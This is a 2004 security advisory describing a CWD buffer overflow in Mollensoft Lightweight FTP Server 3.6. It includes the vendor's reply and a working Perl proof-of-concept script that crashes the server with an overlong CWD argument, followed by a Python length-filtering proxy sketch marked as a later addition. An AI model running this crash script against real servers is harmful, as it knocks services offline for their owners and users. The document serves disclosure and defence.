[NT] Mollensoft Lightweight FTP Server CWD Buffer Overflow


Date: 24 May 2004 13:04:08 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [NT] Mollensoft Lightweight FTP Server CWD Buffer Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Mollensoft Lightweight FTP Server CWD Buffer Overflow
------------------------------------------------------------------------


SUMMARY

STORM has discovered a security vulnerability in Mollensoft Lightweight FTP 
Server (http://www.mollensoft.com/product2.htm). The server's handling of 
the CWD command does not correctly verify that the command's argument fits 
within its internal buffers. This insufficient verification allows an 
authenticated (anonymous or otherwise) user to cause the FTP server to 
crash while trying to read an arbitrary memory location by issuing a 
malformed CWD command.

DETAILS

Vulnerable Systems:
 * Mollensoft Lightweight FTP Server version 3.6

Vendor Response:
BigAl (author) responded with:
I wrote this particular app with Visual Basic and used an FTP ActiveX COM 
component and I am waiting for the component creator to get back to me 
regarding the fix. Unfortunately I cannot snip off any of the commands, as 
access to the command length is not available from the VB component using 
straight VB Code. I am working on moving to .Net so hopefully I can have a 
new FTP server out by fall time frame which is truly multi-threaded and 
totally coded by me.

Exploit:
#!/usr/bin/perl
#
# Mollensoft FTP Server CMD Buffer Overflow
#

use strict;
use IO::Socket::INET;

usage() unless (@ARGV == 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, 
PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

$socket->autoflush(1);

# receive greeting
my $repcode = "220 ";
my $response = recv_reply($socket, $repcode);
print $response;

# send USER command
#my $username = "%00" x 2041;
my $username = "anonymous";
print "USER $username\r\n";
print $socket "USER $username\r\n";

select(undef, undef, undef, 0.002); # sleep of 2 milliseconds 

# send PASS command
my $password = "a\@b.com";
print "PASS $password\r\n";
print $socket "PASS $password\r\n";

my $cmd = "CWD ";
$cmd .= "A" x 224; # Value can range from 224 to 1018
$cmd .= "\r\n";
print "length: ".length($cmd)."\n";
print $socket $cmd;

$repcode = "";
recv_reply($socket, $repcode);

close($socket);
exit(0);

sub usage
{
 # print usage information
 print "\nUsage:  Mollensoft_FTP_Server_crash.pl <host> <port>\n
<host> - The host to connect to
<port> - The TCP port which the FTP server is listening on\n\n";
 exit(1);
}

sub recv_reply
{
 # retrieve any reply
 my $socket = shift;
 my $repcode = shift;
 $socket or die "Can't receive on socket\n";
 
 my $res="";
 while(<$socket>)
 {
  $res .= $_;
  if (/$repcode/) { last; }
 }
 return $res;
}
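
Because the vendor response says the command length cannot be checked inside the VB component, the check can instead sit in front of the server, in a filtering proxy or a network sensor. The sketch below is an added example, not part of the original advisory: the class and function names are hypothetical, the 223-byte cap is an assumption derived from the advisory's 224-byte lower bound, and the cap is applied to every command's argument rather than to CWD only.

```python
import re

# Assumption: 224 bytes is the shortest CWD argument the advisory reports as
# crashing the server, so arguments are capped one byte below that.
MAX_ARG_LEN = 223
CMD_RE = re.compile(rb"^([A-Za-z]{3,4})(?: (.*))?$", re.S)

class FtpControlInspector:
    """Reassembles FTP command lines from TCP chunks and flags long arguments."""

    def __init__(self, max_arg_len=MAX_ARG_LEN):
        self.max_arg_len = max_arg_len
        self.buf = b""
        self.closed = False  # set once a command is blocked; drop the session

    def feed(self, chunk):
        """Return (verdict, verb, arg_len) tuples for commands completed by chunk."""
        if self.closed:
            return []
        self.buf += chunk
        results = []
        while b"\n" in self.buf and not self.closed:
            line, self.buf = self.buf.split(b"\n", 1)
            results.append(self._check(line.rstrip(b"\r")))
        # Flag an unterminated line early so the filter never buffers without
        # bound: verb (4) + space + argument + CR is the longest legal prefix.
        if not self.closed and len(self.buf) > self.max_arg_len + 6:
            results.append(self._check(self.buf))
        return results

    def _check(self, line):
        m = CMD_RE.match(line)
        verb = m.group(1).decode("ascii").upper() if m else "?"
        arg = (m.group(2) or b"") if m else line
        if len(arg) > self.max_arg_len:
            self.closed = True
            return ("block", verb, len(arg))
        return ("pass", verb, len(arg))

def inspect_session(chunks):
    """Run every chunk of one control connection through a fresh inspector."""
    insp = FtpControlInspector()
    return [r for c in chunks for r in insp.feed(c)]

# Constructed sample: a login followed by CWD commands, split across TCP
# segments mid-command; the last CWD carries a 224-byte argument.
SAMPLE = [b"USER anonymous\r\nPASS a@b", b".com\r\nCWD /pub\r\ncwd " + b"A" * 100,
          b"A" * 124 + b"\r\n"]

if __name__ == "__main__":
    for verdict in inspect_session(SAMPLE):
        print(verdict)
```

A caller that receives a "block" verdict should close the client connection without forwarding the command; the inspector ignores further data on that session.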


ADDITIONAL INFORMATION

SecuriTeam would like to thank STORM <[email protected]> for finding 
this vulnerability.



